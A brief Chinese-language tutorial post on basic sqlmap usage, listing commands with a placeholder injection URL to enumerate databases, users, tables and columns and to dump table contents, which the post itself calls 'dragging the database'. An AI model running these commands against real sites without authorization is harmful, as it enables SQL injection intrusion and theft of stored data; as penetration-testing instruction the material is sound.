标签 sqlmap 下的文章

SQLmap-入门使用


1. 基础用法:

./sqlmap.py -u “注入地址” -v 1 –dbs               // 列举数据库
./sqlmap.py -u “注入地址” -v 1 –current-db       // 当前数据库
./sqlmap.py -u “注入地址” -v 1 –users            // 列数据库用户
./sqlmap.py -u “注入地址” -v 1 –current-user      // 当前用户
./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库”     // 列举数据库的表名
./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库”   // 获取表的列名
./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列
已经开始拖库了,它会将获取的数据存储sqlmap/output/中、、、